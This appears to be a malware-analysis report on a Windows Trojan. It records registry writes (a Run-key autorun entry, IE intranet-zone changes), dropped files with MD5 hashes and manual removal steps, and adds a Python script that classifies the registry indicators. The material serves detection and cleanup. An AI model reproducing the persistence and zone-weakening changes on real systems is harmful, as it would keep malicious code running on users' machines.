To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
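Most of the registry writes listed in this report are side effects of ordinary Windows API use rather than actions of the sample: `Cryptography\RNG\Seed` is rewritten by CryptoAPI whenever a process uses a CSP, `MountPoints2\...\BaseClass` and `Shell Folders` are written by the shell, and `MUICache` entries are created by the shell when a binary is launched (so they are evidence of execution, useful for the original description string `prueba1`, but not a change the sample chose to make). The entries that matter are the `Run` key written through reg.exe, the three `ZoneMap` values, and `Explorer\Advanced\Hidden` (a value of 1 means Explorer shows hidden files; compare it against a clean baseline of the same image before treating it as malicious). The following Python script is an added example, not part of the Lavasoft report or its tooling; it parses a constructed subset of the registry lines above, in the report's own format, and sorts them into those buckets. The rule list is the author's, and the ZoneMap values are treated as a posture change to review, not as proof of intent, since wininet also writes them on first use.

```python
import re
from collections import defaultdict

# Constructed sample (added here, not from the original report): registry lines
# in the report's format, taken from the process sections above.
SAMPLE_REGISTRY_ACTIVITY = """\
The process Ptype.exe:752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\\SOFTWARE\\Microsoft\\Cryptography\\RNG]
"Seed" = "53 02 38 01 4D 04 26 FC 42 0B F9 FA 6B F3 6D 6F"
[HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\\Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache\\%System%]
"reg.exe" = "Registry Console Tool"
"wscript.exe" = "Microsoft (R) Windows Based Script Host"
[HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap]
"ProxyBypass" = "1"
"IntranetName" = "1"
"UNCAsIntranet" = "1"
The process reg.exe:1164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced]
"Hidden" = "1"
The process reg.exe:620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]
"Handler" = "%Documents and Settings%\\%current user%\\Application DataFilename.exe"
"""

PROC_RE = re.compile(r"^The process (.+) makes changes in the system registry\.$")
KEY_RE = re.compile(r"^\[(.+)\]$")
VAL_RE = re.compile(r'^"([^"]+)" = "(.*)"$')

# (key pattern, value-name pattern or None, label). First match wins.
# The rule set is the author's assumption about what is noise on Windows XP.
RULES = [
    # side effects of ordinary API use, present in almost every sandbox run
    (r"\\Cryptography\\RNG$",           r"^Seed$",      "noise"),   # CryptoAPI reseeds on each CSP use
    (r"\\Explorer\\MountPoints2\\",     r"^BaseClass$", "noise"),   # shell volume enumeration
    (r"\\Explorer\\Shell Folders$",     None,           "noise"),   # SHGetFolderPath caching
    # not an action of the sample, but proof that the named binaries were launched
    (r"\\ShellNoRoam\\MUICache\\",      None,           "execution_artifact"),
    # changes that alter security posture or survive a reboot
    (r"\\CurrentVersion\\Run(Once)?$",  None,           "persistence"),
    (r"\\Internet Settings\\ZoneMap$",  r"^(UNCAsIntranet|IntranetName|ProxyBypass)$", "ie_zone_weakening"),
    (r"\\Explorer\\Advanced$",          r"^Hidden$",    "explorer_setting"),  # 1 = show hidden files
]
COMPILED = [(re.compile(k, re.I), re.compile(v, re.I) if v else None, label)
            for k, v, label in RULES]


def parse_registry_activity(text):
    """Return (process, key, value_name, data) tuples from the report's registry block."""
    events = []
    proc = key = None
    for line in text.splitlines():
        m = PROC_RE.match(line)
        if m:
            proc, key = m.group(1), None
            continue
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VAL_RE.match(line)
        if m and proc and key:
            events.append((proc, key, m.group(1), m.group(2)))
    return events


def classify(events):
    """Bucket each registry write by the first matching rule; unmatched writes go to 'review'."""
    buckets = defaultdict(list)
    for ev in events:
        _proc, key, name, _data = ev
        for key_re, name_re, label in COMPILED:
            if key_re.search(key) and (name_re is None or name_re.match(name)):
                buckets[label].append(ev)
                break
        else:
            buckets["review"].append(ev)
    return dict(buckets)


def autorun_entries(events):
    """Just the persistence entries, as (value name, launched path) pairs."""
    return [(name, data) for (_p, key, name, data) in classify(events).get("persistence", [])]


if __name__ == "__main__":
    evs = parse_registry_activity(SAMPLE_REGISTRY_ACTIVITY)
    for label, items in classify(evs).items():
        print(f"{label}: {len(items)}")
    for name, path in autorun_entries(evs):
        print("autorun", name, "->", path)
```

Anything landing in `review` is a key the rule list has not seen before and deserves a look; on this report that would include `HKLM\SOFTWARE\Big Fish Games`, written by the bundled game-client installer. Note also that the autorun path recovered here, `...\Application DataFilename.exe`, lacks a backslash between the folder and the file name, exactly as the dropped file in the WScript.exe file activity does; the two are consistent with each other, so the persistence entry does point at the file that was written.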
The process reg.exe:232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 5F 52 FA FF 04 8F DD BF D5 E3 FE D2 28 C2 53"
To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 28 1C 81 18 BD 50 36 49 FD A9 BF 9A 0D 0B A4"
To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A B6 5F 42 F8 CE 0F 6D 9A 58 AC 7E B0 C2 27 35"
To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 44 E8 05 43 57 53 92 02 CA 03 5D 58 78 86 9E"
To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 77 27 A5 2F F3 C4 27 2E B3 5C 66 03 B9 7A 3F"
To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 ED B5 B6 90 D1 5D AE B3 58 25 25 F1 64 68 27"
To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 8B E6 D1 78 1B 00 F2 41 1F 91 04 8F 05 25 21"
To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 BA 54 4F C9 49 A0 2A D9 3A AF 71 DC 56 B3 2D"
To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A C4 76 4F 0B 40 11 5E 7C 64 00 63 A0 71 DF D4"
To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB D4 B0 6F B1 46 B9 14 99 CE 94 F3 95 84 E6 4C"
To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 8F 1E BE D5 94 10 F9 36 BE 03 C5 D3 3C 8F DA"
To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 44 0B 96 EA 08 30 BC 7F 68 9E AC B0 84 55 26"
To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 32 35 78 D9 64 26 02 77 86 DA AB 72 14 27 11"
To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 2B 32 F6 79 DF D7 DE 11 97 C9 8E E9 5E 01 FB"
To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 98 C7 AE 54 96 D5 54 81 09 09 A1 11 C7 C6 9E"
To run automatically each time Windows boots, the Trojan adds the following reference to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 B4 D5 BB 11 CD E8 A7 02 F4 DF E4 CB 97 75 67"
To run itself each time Windows boots, the Trojan adds the following reference to its file under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 3A 93 F3 0F A4 63 58 FC 2A 5C 47 31 1D 41 A1"
To run itself each time Windows boots, the Trojan adds the following reference to its file under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 C6 89 C6 50 71 1E 52 78 E1 EB 04 58 9A E2 C3"
To run itself each time Windows boots, the Trojan adds the following reference to its file under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 EF 4A B4 3D FF 01 E1 5F 16 41 EB 66 EA BC D0"
To run itself each time Windows boots, the Trojan adds the following reference to its file under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 C1 AD 74 56 93 F3 39 54 1A 20 26 62 B4 E2 F7"
To run itself each time Windows boots, the Trojan adds the following reference to its file under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 6D 27 EB 29 59 AC AF A0 21 19 BA 70 09 96 49"
To run itself each time Windows boots, the Trojan adds the following reference to its file under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 78 5B DF C3 41 DC E3 E9 E5 C5 42 C8 C3 13 7C"
To run itself each time Windows boots, the Trojan adds the following reference to its file under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe:1128 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Big Fish Games\Persistence\Install]
"(Default)" = "{4CFDE078-C665-429D-9A80-1C8F5D0EF06D}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Big Fish Games\Persistence\EnabledToolbars]
"1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 7B F9 92 F0 A7 F4 46 4D 69 BD 47 84 04 6B B7"
[HKLM\SOFTWARE\Big Fish Games]
"Upgraded" = "0"
[HKLM\SOFTWARE\Big Fish Games\Persistence]
"MSFT_DirectX_EULA_Accepted" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Big Fish Games\Client]
"GameClubMember" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies the IE Local Intranet zone settings so that all network paths (UNCs) are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
It also maps all sites that bypass the proxy server to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
It also maps all local (intranet) sites not listed in other zones, i.e. host names without dots, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Note that these three values are the three "Local intranet" check boxes in IE's Security tab, and together with "MigrateProxy", "SavedLegacySettings" and the Content.IE5 cache paths above they are what WinINet writes the first time it initialises in a profile (here through the Big Fish installer's HTTP downloads). On their own they are weak indicators compared with the Run key entry and the downloads from allpokersoftware.net below.
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
9a78a4f43e8b5b5d8a902fd62652f31c | c:\Documents and Settings\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe |
ecdb92b185077fffcd650ea65cf5d510 | c:\Documents and Settings\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe |
334b41d348990d25241a5d4aba42391b | c:\Documents and Settings\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe |
e1d7bc3fcbadd4cf8b5a27b5edad90c2 | c:\Documents and Settings\"%CurrentUserName%"\Application DataFilename.exe |
5d9984768c24fda50bc27f26301d414c | c:\Documents and Settings\"%CurrentUserName%"\CrashHandler.exe |
3ed972db9e8adf26a3bfd1c038922ffb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE |
7ec86b3094b76ab39cfe287b8e3e6737 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE |
02d7f5e5dd1512bee2343a21d9970eba | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\NSISdl.dll |
959ea64598b9a3e494c00e8fa793be7e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\System.dll |
d16e06c5de8fb8213a0464568ed9852f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\UserInfo.dll |
bf1ccc7f5c46e024e800f6c1e9df8206 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\inetc.dll |
fae3be7a9827eaa3ef9f43832805e110 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\nsProcess.dll |
4e1c46e37af4b3ab0036cb1e85c81608 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa4.tmp\uac.dll |
689a3befb2abc9a4c968dab1bd33a965 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\AccessControl.dll |
959ea64598b9a3e494c00e8fa793be7e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\System.dll |
d16e06c5de8fb8213a0464568ed9852f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\UserInfo.dll |
4e1c46e37af4b3ab0036cb1e85c81608 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscD.tmp\uac.dll |
cb3897fff233b89fe46c52f4a86636f6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi2.tmp\System.dll |
f2805a876754590f252130d367f382ff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi2.tmp\UserInfo.dll |
cb3897fff233b89fe46c52f4a86636f6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsxA.tmp\System.dll |
f2805a876754590f252130d367f382ff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsxA.tmp\UserInfo.dll |
e1d7bc3fcbadd4cf8b5a27b5edad90c2 | c:\Documents and Settings\"%CurrentUserName%"\Ptype.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060
WScript.exe:368
CrashHandler.exe:420
CrashHandler.exe:680
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648
bfgsetup_s1_l1.exe:1796
%original file name%.exe:1236
reg.exe:1164
reg.exe:620
reg.exe:232
reg.exe:204
reg.exe:1832
reg.exe:508
reg.exe:1352
reg.exe:1292
reg.exe:280
reg.exe:308
reg.exe:1176
reg.exe:996
reg.exe:468
reg.exe:208
reg.exe:1356
reg.exe:1496
reg.exe:964
reg.exe:904
reg.exe:968
reg.exe:2024
reg.exe:644
reg.exe:1100
reg.exe:544
reg.exe:1764
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Ptype.exe (3312 bytes)
%Documents and Settings%\%current user%\CrashHandler.exe (81017 bytes)
%Documents and Settings%\%current user%\Application DataFilename.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_socket.pyd (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\select.pyd (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcm90.dll (589 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_hashlib.pyd (2341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\Microsoft.VC90.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\unicodedata.pyd (3821 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\win32api.pyd (706 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcp90.dll (2342 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\triple.exe.manifest (731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\python27.dll (16699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcr90.dll (4448 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_ssl.pyd (6386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\bz2.pyd (1137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\pywintypes27.dll (1098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\UserInfo.dll (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe (5731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\System.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aihgmsvmb.vbs (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~a21524.log (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\UserInfo.dll (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe (1120371 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\System.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_en.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_fr.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_es.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_sw.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_de.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_de.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_pt.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_dn.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_it.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_it.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_fr.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_pt.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_en.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_jp.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_es.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\AccessControl.dll (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_dn.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_jp.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_du.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_du.ini (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamemanager_install_log.txt (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\uac.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxC.tmp (1178954 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\modern-header.bmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_sw.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (36 bytes)
